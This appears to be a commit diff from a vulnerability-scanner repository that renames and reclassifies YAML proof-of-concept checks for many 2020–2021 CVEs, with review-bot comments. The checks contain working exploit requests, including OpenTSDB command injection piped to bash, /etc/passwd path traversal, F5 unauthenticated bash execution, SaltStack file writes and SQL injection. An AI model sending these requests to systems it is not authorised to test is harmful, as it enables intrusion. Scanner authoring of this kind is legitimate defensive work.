     1 +id: CVE-2020-35476
    2 2   
    3 3  info:
    4  - name: opentsdb-cve-2020-35476-rce
     4 + name: OpenTSDB 2.4.0 Remote Code Execution
    5 5   author: mvhz81
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomLowercase(3)
    12 10   r2: randomLowercase(3)
    skipped 2 lines
    15 13  rules:
    16 14   r0:
    17 15   request:
    18  - cache: true
    19 16   method: GET
    20 17   path: /s/opentsdb_header.jpg
    21  - follow_redirects: false
    22 18   expression: response.status == 200 && response.content_type.contains("text/plain") && response.body.bcontains(b"\xff\xd8\xff\xe1")
    23 19   r1:
    24 20   request:
    25  - cache: true
    26 21   method: POST
    27 22   path: /api/put
    28 23   body: |-
    skipped 17 lines
    46 41   }
    47 42   }
    48 43   ]
    49  - follow_redirects: false
    50 44   expression: sleep(5) && response.status == 204 && response.content_type.contains("json")
    51 45   r2:
    52 46   request:
    53  - cache: true
    54 47   method: GET
    55 48   path: /q?start=2000/10/21-00:00:00&end=2020/12/25-00:00:00&m=sum:{{r1}}.{{r2}}.{{r3}}&o=&yrange=[0:system('echo%20-e%20"ZWNobyAxMjMgfG1kNXN1bSAxPiYyCg=="%20|%20base64%20-d%20|bash')]&wxh=1698x316&style=linespoint&json
    56  - follow_redirects: false
    57 49   expression: response.status == 400 && response.content_type.contains("json") && "ba1f2511fc30423bdbb183fe33f3dd0f".bmatches(response.body)
    58 50  expression: r0() && r1() && r2()
    59 51   
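Review bot: The r2 payload on line 48 carries an opaque base64 blob that nothing in the file explains; it decodes to `echo 123 |md5sum 1>&2`, and the expected hash on line 49 is md5 of "123\n". Add a comment above r2 such as `# base64 decodes to: echo 123 |md5sum 1>&2 ; expected md5 of "123\n"`, or better, derive the echoed value from the random `set` variables as the other RCE rules in this commit do, so the marker is not a static signature. Note also that r1's POST to `/api/put` on line 21 stores a data point under the random metric name in the target's TSDB and is never removed, and that `sleep(5)` on line 44 applies to every scanned host.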
    afrog-pocs/unreviewed/gateone-cve-2020-35736.yml afrog-pocs/CVE/2020/CVE-2020-35736.yaml
    1  -id: gateone-cve-2020-35736
     1 +id: CVE-2020-35736
    2 2   
    3 3  info:
    4  - name: gateone-cve-2020-35736
     4 + name: GateOne Arbitrary File Download
    5 5   author: tangshoupu
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /
    16 13   follow_redirects: true
    17 14   expression: response.status == 200 && response.body.bcontains(b"GateOne.init") && response.body.bcontains(b"href=\"/static/gateone.css\"")
    18 15   r1:
    19 16   request:
    20  - cache: true
    21 17   method: GET
    22 18   path: /downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
    23  - follow_redirects: false
    24 19   expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
    25 20  expression: r0() && r1()
    26 21   
    skipped 1 lines
    afrog-pocs/unreviewed/zeit-nodejs-cve-2020-5284-directory-traversal.yml afrog-pocs/CVE/2020/CVE-2020-5284.yaml
    1  -id: zeit-nodejs-cve-2020-5284-directory-traversal
     1 +id: CVE-2020-5284
    2 2   
    3 3  info:
    4  - name: zeit-nodejs-cve-2020-5284-directory-traversal
     4 + name: Next.js .next limited path traversal
    5 5   author: x1n9Qi8
    6  - severity: high
     6 + severity: medium
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /_next/static/../server/pages-manifest.json
    16 13   expression: 'response.status == 200 && response.headers["Content-Type"].contains("application/json") && "/_app\": \".*?_app\\.js".bmatches(response.body)'
    skipped 1 lines
    afrog-pocs/unreviewed/spring-cloud-cve-2020-5405.yml afrog-pocs/CVE/2020/CVE-2020-5405.yaml
    1  -id: spring-cloud-cve-2020-5405
     1 +id: CVE-2020-5405
    2 2   
    3 3  info:
    4  - name: spring-cloud-cve-2020-5405
     4 + name: Spring Cloud Directory Traversal
    5 5   author: kingkk(https://www.kingkk.com/)
    6  - severity: high
     6 + severity: medium
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf
    16 13   follow_redirects: true
    skipped 3 lines
    afrog-pocs/unreviewed/spring-cloud-cve-2020-5410.yml afrog-pocs/CVE/2020/CVE-2020-5410.yaml
    1  -id: spring-cloud-cve-2020-5410
     1 +id: CVE-2020-5410
    2 2   
    3 3  info:
    4  - name: spring-cloud-cve-2020-5410
     4 + name: Spring Cloud Config Server Directory Traversal
    5 5   author: Soveless(https://github.com/Soveless)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a
    16 13   expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
    skipped 2 lines
    afrog-pocs/unreviewed/gilacms-cve-2020-5515.yml afrog-pocs/CVE/2020/CVE-2020-5515.yaml
    1  -id: gilacms-cve-2020-5515
     1 +id: CVE-2020-5515
    2 2   
    3 3  info:
    4  - name: gilacms-cve-2020-5515
     4 + name: Gila CMS 1.11.8 SQL Injection.
    5 5   author: PickledFish(https://github.com/PickledFish)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(200000000, 210000000)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: GET
    17 14   path: /admin/sql?query=SELECT%20md5({{r1}})
    18 15   expression: response.body.bcontains(bytes(md5(string(r1))))
    skipped 3 lines
    afrog-pocs/unreviewed/f5-tmui-cve-2020-5902-rce.yml afrog-pocs/CVE/2020/CVE-2020-5902.yaml
    1  -id: f5-tmui-cve-2020-5902-rce
     1 +id: CVE-2020-5902
    2 2   
    3 3  info:
    4  - name: f5-tmui-cve-2020-5902-rce
     4 + name: F5 BIG-IP TMUI RCE
    5 5   author: Jing Ling
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp
    16 13   headers:
    skipped 6 lines
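Review bot: Line 6 keeps `severity: high` for a rule this commit now names "F5 BIG-IP TMUI RCE", while the same commit moves comparable unauthenticated RCE rules (CVE-2020-28188, CVE-2021-22986, CVE-2021-21972) to `critical`. Suggest `severity: critical`, or a short note in the file explaining why this one is rated lower. The request headers and body are in the collapsed lines.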
    afrog-pocs/unreviewed/satellian-cve-2020-7980-rce.yml afrog-pocs/CVE/2020/CVE-2020-7980.yaml
    1  -id: satellian-cve-2020-7980-rce
     1 +id: CVE-2020-7980
    2 2   
    3 3  info:
    4  - name: satellian-cve-2020-7980-rce
     4 + name: Satellian 1.12 Remote Code Execution
    5 5   author: JingLing(https://hackfun.org/)
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(800000000, 1000000000)
    12 10   r2: randomInt(800000000, 1000000000)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: POST
    18 15   path: /cgi-bin/libagent.cgi?type=J
    19 16   headers:
    skipped 7 lines
    afrog-pocs/unreviewed/citrix-cve-2020-8191-xss.yml afrog-pocs/CVE/2020/CVE-2020-8191.yaml
    1  -id: citrix-cve-2020-8191-xss
     1 +id: CVE-2020-8191
    2 2   
    3 3  info:
    4 4   name: citrix-cve-2020-8191-xss
    5 5   author: JingLing(https://hackfun.org/)
    6  - severity: high
     6 + severity: medium
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomLowercase(6)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: POST
    17 14   path: /menu/stapp
    18 15   headers:
    skipped 6 lines
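Review bot: Line 4 still carries the machine-style `name: citrix-cve-2020-8191-xss` although `id` on line 1 was rewritten and every other file in this commit received a human-readable `name`; this one looks missed. Suggest `name: Citrix Reflected XSS`, with the exact product wording confirmed against the advisory. The request headers and body are in the collapsed lines.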
    afrog-pocs/unreviewed/citrix-cve-2020-8193-unauthorized.yml afrog-pocs/CVE/2020/CVE-2020-8193.yaml
    1  -id: citrix-cve-2020-8193-unauthorized
     1 +id: CVE-2020-8193
    2 2   
    3 3  info:
    4  - name: citrix-cve-2020-8193-unauthorized
     4 + name: Citrix unauthenticated LFI
    5 5   author: bufsnake(https://github.com/bufsnake)
    6  - severity: high
     6 + severity: medium
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   user: randomLowercase(8)
    12 10   pass: randomLowercase(8)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: POST
    18 15   path: /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
    19 16   headers:
    skipped 1 lines
    21 18   X-NITRO-PASS: '{{pass}}'
    22 19   X-NITRO-USER: '{{user}}'
    23 20   body: <appfwprofile><login></login></appfwprofile>
    24  - follow_redirects: false
    25 21   expression: response.status == 406 && "(?i)SESSID=\\w{32}".bmatches(bytes(response.headers["Set-Cookie"]))
    26 22  expression: r0()
    27 23   
    afrog-pocs/unreviewed/citrix-xenmobile-cve-2020-8209.yml afrog-pocs/CVE/2020/CVE-2020-8209.yaml
    1  -id: citrix-xenmobile-cve-2020-8209
     1 +id: CVE-2020-8209
    2 2   
    3 3  info:
    4  - name: citrix-xenmobile-cve-2020-8209
     4 + name: Citrix XenMobile Server Path Traversal
    5 5   author: B1anda0(https://github.com/B1anda0)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
    16  - follow_redirects: false
    17 13   expression: response.status == 200 && response.content_type.contains("octet-stream") && "^root:[x*]:0:0:".bmatches(response.body)
    18 14  expression: r0()
    19 15   
    afrog-pocs/unreviewed/draytek-cve-2020-8515.yml afrog-pocs/CVE/2020/CVE-2020-8515.yaml
    1  -id: draytek-cve-2020-8515
     1 +id: CVE-2020-8515
    2 2   
    3 3  info:
    4  - name: draytek-cve-2020-8515
     4 + name: DrayTek pre-auth RCE
    5 5   author: Soveless(https://github.com/Soveless)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /cgi-bin/mainfunction.cgi
    16 13   headers:
    skipped 6 lines
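Review bot: Line 6 keeps `severity: high` under the new `name: DrayTek pre-auth RCE`, while this commit sets `critical` on other pre-auth RCE rules (CVE-2020-28188, CVE-2021-22986, CVE-2020-21224). Suggest `severity: critical` for consistency, or a short reason in the file if the lower rating is intentional. The POST body and expression are in the collapsed lines.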
    afrog-pocs/cve/2020/dlink-cve-2020-9376-dump-credentials.yml afrog-pocs/CVE/2020/CVE-2020-9376.yaml
    1  -id: dlink-cve-2020-9376-dump-credentials
     1 +id: CVE-2020-9376
    2 2   
    3 3  info:
    4  - name: dlink-cve-2020-9376-dump-credentials
     4 + name: DLink dir610 credentials dump
    5 5   author: x1n9Qi8
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /getcfg.php
    16 13   headers:
    skipped 5 lines
    afrog-pocs/unreviewed/skywalking-cve-2020-9483-sqli.yml afrog-pocs/CVE/2020/CVE-2020-9483.yaml
    1  -id: skywalking-cve-2020-9483-sqli
     1 +id: CVE-2020-9483
    2 2   
    3 3  info:
    4  - name: skywalking-cve-2020-9483-sqli
     4 + name: SSkyWalking SQLI
    5 5   author: sndav(https://github.com/Sndav)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(10000, 99999)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: POST
    17 14   path: /graphql
    18 15   headers:
    skipped 6 lines
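Review bot: Line 4 has a typo in the new name, `SSkyWalking SQLI`; the product is SkyWalking, so `name: Apache SkyWalking SQL Injection` (or `SkyWalking SQLi`) is what should be shown to users. The GraphQL body and expression are in the collapsed lines and were not checked.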
  • afrog-pocs/cve/2020/CVE-2020-9496.yml afrog-pocs/CVE/2020/CVE-2020-9496.yaml
    Content is identical
    afrog-pocs/unreviewed/craftcms-seomatic-cve-2020-9757-rce.yml afrog-pocs/CVE/2020/CVE-2020-9757.yaml
    1  -id: craftcms-seomatic-cve-2020-9757-rce
     1 +id: CVE-2020-9757
    2 2   
    3 3  info:
    4  - name: craftcms-seomatic-cve-2020-9757-rce
     4 + name: SEOmatic < 3.3.0 Server-Side Template Injection
    5 5   author: x1n9Qi8
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(40000, 44800)
    12 10   r2: randomInt(40000, 44800)
    13 11  rules:
    14 12   poc10:
    15 13   request:
    16  - cache: true
    17 14   method: GET
    18 15   path: /actions/seomatic/meta-container/meta-link-container/?uri={{{{r1}}*'{{r2}}'}}
    19 16   expression: response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
    20 17   poc20:
    21 18   request:
    22  - cache: true
    23 19   method: GET
    24 20   path: /actions/seomatic/meta-container/all-meta-containers?uri={{{{r1}}*'{{r2}}'}}
    25 21   expression: response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
    skipped 3 lines
    afrog-pocs/unreviewed/jellyfin-file-read-cve-2021-21402.yml afrog-pocs/CVE/2021/CVE-2021-21402.yaml
    1  -id: jellyfin-file-read-cve-2021-21402
     1 +id: CVE-2021-21402
    2 2   
    3 3  info:
    4  - name: jellyfin-file-read-cve-2021-21402
     4 + name: Jellyfin prior to 10.7.0 Unauthenticated Arbitrary File Read
    5 5   author: Print1n(https://github.com/Print1n)
    6  - severity: high
     6 + severity: medium
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
    16 13   expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
    skipped 2 lines
    afrog-pocs/unreviewed/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml afrog-pocs/CVE/2021/CVE-2021-21972.yaml
    1  -id: vmware-vcenter-unauthorized-rce-cve-2021-21972
     1 +id: CVE-2021-21972
    2 2   
    3 3  info:
    4  - name: vmware-vcenter-unauthorized-rce-cve-2021-21972
     4 + name: VMware vCenter Unauthenticated RCE
    5 5   author: B1anda0(https://github.com/B1anda0)
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /ui/vropspluginui/rest/services/uploadova
    16  - follow_redirects: false
    17 13   expression: response.status == 405 && response.body.bcontains(b"Method Not Allowed")
    18 14   r1:
    19 15   request:
    20  - cache: true
    21 16   method: GET
    22 17   path: /ui/vropspluginui/rest/services/getstatus
    23  - follow_redirects: false
    24 18   expression: response.status == 200 && response.body.bcontains(b"States") && response.body.bcontains(b"Install Progress")
    25 19  expression: r0() && r1()
    26 20   
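Review bot: Both rules only check that `/ui/vropspluginui/rest/services/uploadova` answers 405 (line 13) and that `getstatus` returns a body containing `States` and `Install Progress` (line 18); that shows the vROps plugin endpoints are reachable without authentication, not that the upload path traversal is exploitable, so a host whose fix left the endpoints in place would still be reported at the new `severity: critical` on line 6. Whether the vendor fix removes these endpoints is something to confirm against the advisory. Either state in `description` that this is an unauthenticated-exposure check rather than an exploitation check, or name the rule accordingly so the severity is read in context.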
    afrog-pocs/unreviewed/vmware-vrealize-cve-2021-21975-ssrf.yml afrog-pocs/CVE/2021/CVE-2021-21975.yaml
    1  -id: vmware-vrealize-cve-2021-21975-ssrf
     1 +id: CVE-2021-21975
    2 2   
    3 3  info:
    4  - name: vmware-vrealize-cve-2021-21975-ssrf
     4 + name: vRealize Operations Manager API SSRF (VMWare Operations)
    5 5   author: Loneyer
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /casa/nodes/thumbprints
    16 13   headers:
    skipped 7 lines
    afrog-pocs/cve/2021/CVE-2021-22205.yaml afrog-pocs/CVE/2021/CVE-2021-22205.yaml
    skipped 12 lines
    13 13   - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
    14 14   - https://hackerone.com/reports/1154542
    15 15   - https://nvd.nist.gov/vuln/detail/CVE-2021-22205
    16  - classification:
    17  - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    18  - cvss-score: 9.90
    19  - cve-id: CVE-2021-22205
    20  - cwe-id: CWE-20
    21  - tags: cve,cve2021,gitlab,rce
    22 16   
    23  -manual: true
    24  -transport: http
    25 17  rules:
    26 18   r0:
    27 19   request:
    28  - cache: true
    29 20   method: GET
    30 21   path: /users/sign_in
    31 22   follow_redirects: true
    skipped 92 lines
    afrog-pocs/unreviewed/gitlab-ssrf-cve-2021-22214.yml afrog-pocs/CVE/2021/CVE-2021-22214.yaml
    1  -id: gitlab-ssrf-cve-2021-22214
     1 +id: CVE-2021-22214
    2 2   
    3 3  info:
    4  - name: gitlab-ssrf-cve-2021-22214
     4 + name: Unauthenticated Gitlab SSRF - CI Lint API
    5 5   author: mumu0215(https://github.com/mumu0215)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /api/v4/ci/lint
    16 13   headers:
    skipped 7 lines
    afrog-pocs/unreviewed/f5-cve-2021-22986.yml afrog-pocs/CVE/2021/CVE-2021-22986.yaml
    1  -id: f5-cve-2021-22986
     1 +id: CVE-2021-22986
    2 2   
    3 3  info:
    4  - name: f5-cve-2021-22986
     4 + name: F5 BIG-IP iControl REST unauthenticated RCE
    5 5   author: Hex
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(800000000, 1000000000)
    12 10   r2: randomInt(800000000, 1000000000)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: POST
    18 15   path: /mgmt/tm/util/bash
    19 16   headers:
    skipped 1 lines
    21 18   Content-Type: application/json
    22 19   X-F5-Auth-Token: ' '
    23 20   body: '{"command":"run","utilCmdArgs":"-c ''expr {{r1}} + {{r2}}''"}'
    24  - follow_redirects: false
    25 21   expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
    26 22  expression: r0()
    27 23   
    skipped 1 lines
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/unreviewed/saltstack-cve-2021-25282-file-write.yml afrog-pocs/CVE/2021/CVE-2021-25282.yaml
    1  -id: saltstack-cve-2021-25282-file-write
     1 +id: CVE-2021-25282
    2 2   
    3 3  info:
    4  - name: saltstack-cve-2021-25282-file-write
     4 + name: SaltStack Salt Unautherenticated Remote Command Execution
    5 5   author: jweny(https://github.com/jweny)
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomLowercase(5)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: GET
    17 14   path: /run
    18  - follow_redirects: false
    19 15   expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"wheel_async") && response.body.bcontains(b"runner_async")
    20 16   r1:
    21 17   request:
    22  - cache: true
    23 18   method: POST
    24 19   path: /run
    25 20   headers:
    26 21   Content-type: application/json
    27 22   body: '{"eauth":"auto","client":"wheel_async","fun":"pillar_roots.write","data":"{{r1}}","path":"../../../../../../../../../tmp/{{r1}}"}'
    28  - follow_redirects: false
    29 23   expression: response.status == 200 && response.content_type.icontains("application/json") && "salt/wheel/d*".bmatches(response.body)
    30 24  expression: r0() && r1()
    31 25   
    skipped 1 lines
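Review bot: The new name at line 4 misspells the word and should read `name: SaltStack Salt Unauthenticated Remote Command Execution`. Separately, rule r1 still writes a file to `/tmp/{{r1}}` on the target through `pillar_roots.write`, and the PoC has no `clean:` rule to remove it, whereas CVE-2021-36260 in this same commit carries a `clean:` rule for its own side effect. Either add a cleanup rule or state in `description` that the check leaves a file on the host so operators running the scan can account for it.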
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/unreviewed/confluence-cve-2021-26084.yml afrog-pocs/CVE/2021/CVE-2021-26084.yaml
    1  -id: confluence-cve-2021-26084
     1 +id: CVE-2021-26084
    2 2   
    3 3  info:
    4  - name: confluence-cve-2021-26084
     4 + name: Confluence Server OGNL injection RCE
    5 5   author: Loneyer(https://github.com/Loneyers)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(100000, 999999)
    12 10   r2: randomInt(100000, 999999)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: POST
    18 15   path: /pages/createpage-entervariables.action?SpaceKey=x
    19 16   body: |
    skipped 5 lines
  • ■ ■ ■ ■ ■ ■
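--- a/afrog-pocs/unreviewed/confluence-cve-2021-26085-arbitrary-file-read.yml
+++ b/afrog-pocs/CVE/2021/CVE-2021-26085.yaml
@@ -1,21 +1,17 @@
-id: confluence-cve-2021-26085-arbitrary-file-read
+id: CVE-2021-26085
 
 info:
- name: confluence-cve-2021-26085-arbitrary-file-read
+ name: Confluence Pre-Authorization Arbitrary File Read
  author: wulalalaaa(https://github.com/wulalalaaa)
- severity: high
+ severity: medium
 
-manual: true
-transport: http
 set:
  rand: randomLowercase(6)
 rules:
  r0:
  request:
- cache: true
  method: GET
  path: /s/{{rand}}/_/;/WEB-INF/web.xml
- follow_redirects: false
  expression: response.status == 200 && response.body.bcontains(b"<display-name>Confluence</display-name>") && response.body.bcontains(b"com.atlassian.confluence.setup.ConfluenceAppConfig")
 expression: r0()
 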
  • ■ ■ ■ ■ ■ ■
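--- a/afrog-pocs/unreviewed/exchange-cve-2021-26855-ssrf.yml
+++ b/afrog-pocs/CVE/2021/CVE-2021-26855.yaml
@@ -1,21 +1,17 @@
-id: exchange-cve-2021-26855-ssrf
+id: CVE-2021-26855
 
 info:
- name: exchange-cve-2021-26855-ssrf
+ name: Microsoft Exchange Server SSRF Vulnerability
  author: sharecast
- severity: high
+ severity: critical
 
-manual: true
-transport: http
 rules:
  r0:
  request:
- cache: true
  method: GET
  path: /owa/auth/x.js
  headers:
  Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
- follow_redirects: false
  expression: response.headers["X-CalculatedBETarget"].icontains("localhost")
 expression: r0()
 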
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/cve/2021/CVE-2021-27905.yaml afrog-pocs/CVE/2021/CVE-2021-27905.yaml
    skipped 10 lines
    11 11   - https://ubuntu.com/security/CVE-2021-27905
    12 12   - https://nvd.nist.gov/vuln/detail/CVE-2021-27905
    13 13   - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
    14  - classification:
    15  - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    16  - cvss-score: 9.80
    17  - cve-id: CVE-2021-27905
    18  - cwe-id: CWE-918
    19 14   
    20  -transport: http
    21 15  rules:
    22 16   r0:
    23 17   request:
    skipped 13 lines
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/unreviewed/jetty-cve-2021-28164.yml afrog-pocs/CVE/2021/CVE-2021-28164.yaml
    1  -id: jetty-cve-2021-28164
     1 +id: CVE-2021-28164
    2 2   
    3 3  info:
    4  - name: jetty-cve-2021-28164
     4 + name: Jetty Authorization Before Parsing and Canonicalization
    5 5   author: Sup3rm4nx0x (https://github.com/Sup3rm4nx0x)
    6  - severity: high
     6 + severity: medium
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /%2e/WEB-INF/web.xml
    16  - follow_redirects: false
    17 13   expression: response.status == 200 && response.content_type == "application/xml" && response.body.bcontains(b"</web-app>")
    18 14  expression: r0()
    19 15   
    skipped 1 lines
  • ■ ■ ■ ■
    afrog-pocs/cve/2021/CVE-2021-29490.yml afrog-pocs/CVE/2021/CVE-2021-29490.yaml
    1 1  id: CVE-2021-29490
    2 2   
    3 3  info:
    4  - name: jellyfin-cve-2021-29490
     4 + name: Jellyfin SSRF
    5 5   author: 曦shen
    6 6   severity: medium
    7 7   
    8 8  set:
    9 9   rand1: randomLowercase(6)
    10  -manual: true
    11  -transport: http
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: GET
    17 14   path: /Images/Remote?imageUrl=http://{{rand1}}.baidu.com
    18 15   follow_redirects: true
    skipped 4 lines
  • ■ ■ ■ ■ ■ ■
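--- /dev/null
+++ b/afrog-pocs/CVE/2021/CVE-2021-29622.yaml
@@ -0,0 +1,15 @@
+id: CVE-2021-29622
+
+info:
+ name: Prometheus v2.23.0 to v2.26.0, and v2.27.0 Open Redirect
+ author: fuzz7j(https://github.com/fuzz7j)
+ severity: medium
+
+rules:
+ r0:
+ request:
+ method: GET
+ path: /new/newhttps:/baidu.com
+ expression: response.status == 302 && response.headers["location"] == "https:/baidu.com?"
+expression: r0()
+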
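Review bot: The new file carries no `description` and no `reference` list, while the other PoCs in this commit keep their references (for example CVE-2021-27905 at lines 11-13). Add at least `reference:` followed by ` - https://nvd.nist.gov/vuln/detail/CVE-2021-29622` under `info` so a reader can trace the version range named in `name`. The expression at line 13 also pins the exact Location value `https:/baidu.com?`; any difference in how a given build rewrites the path would turn a vulnerable host into a false negative, so this is worth confirming against the affected versions before the PoC leaves review.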
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/unreviewed/lanproxy-cve-2021-3019-lfi.yml afrog-pocs/CVE/2021/CVE-2021-3019.yaml
    1  -id: lanproxy-cve-2021-3019-lfi
     1 +id: CVE-2021-3019
    2 2   
    3 3  info:
    4  - name: lanproxy-cve-2021-3019-lfi
     4 + name: Lanproxy Directory Traversal
    5 5   author: pa55w0rd(www.pa55w0rd.online/)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /../conf/config.properties
    16 13   expression: response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream")
    skipped 3 lines
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/unreviewed/laravel-cve-2021-3129.yml afrog-pocs/CVE/2021/CVE-2021-3129.yaml
    1  -id: laravel-cve-2021-3129
     1 +id: CVE-2021-3129
    2 2   
    3 3  info:
    4  - name: laravel-cve-2021-3129
     4 + name: LARAVEL <= V8.4.2 DEBUG MODE - REMOTE CODE EXECUTION
    5 5   author: Jarcis-cy(https://github.com/Jarcis-cy)
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r: randomLowercase(12)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: POST
    17 14   path: /_ignition/execute-solution
    18 15   headers:
    skipped 15 lines
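Review bot: The new name at line 4 is written entirely in capitals, `LARAVEL <= V8.4.2 DEBUG MODE - REMOTE CODE EXECUTION`, unlike every other `name` introduced by this commit. Title case keeps the listing consistent and easier to scan: `name: Laravel <= v8.4.2 Debug Mode - Remote Code Execution`.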
  • ■ ■ ■ ■ ■
    afrog-pocs/unreviewed/pentaho-cve-2021-31602-authentication-bypass.yml afrog-pocs/CVE/2021/CVE-2021-31602.yaml
    1  -id: pentaho-cve-2021-31602-authentication-bypass
     1 +id: CVE-2021-31602
    2 2   
    3 3  info:
    4  - name: pentaho-cve-2021-31602-authentication-bypass
     4 + name: Pentahoa uthentication bypass
    5 5   author: For3stCo1d (https://github.com/For3stCo1d)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /pentaho/api/userrolelist/systemRoles?require-cfg.js
    16  - follow_redirects: false
    17 13   expression: response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"<roles>Anonymous</roles></roleList>")
    18 14   r1:
    19 15   request:
    20  - cache: true
    21 16   method: GET
    22 17   path: /api/userrolelist/systemRoles?require-cfg.js
    23  - follow_redirects: false
    24 18   expression: response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"<roles>Anonymous</roles></roleList>")
    25 19  expression: r0() || r1()
    26 20   
    skipped 1 lines
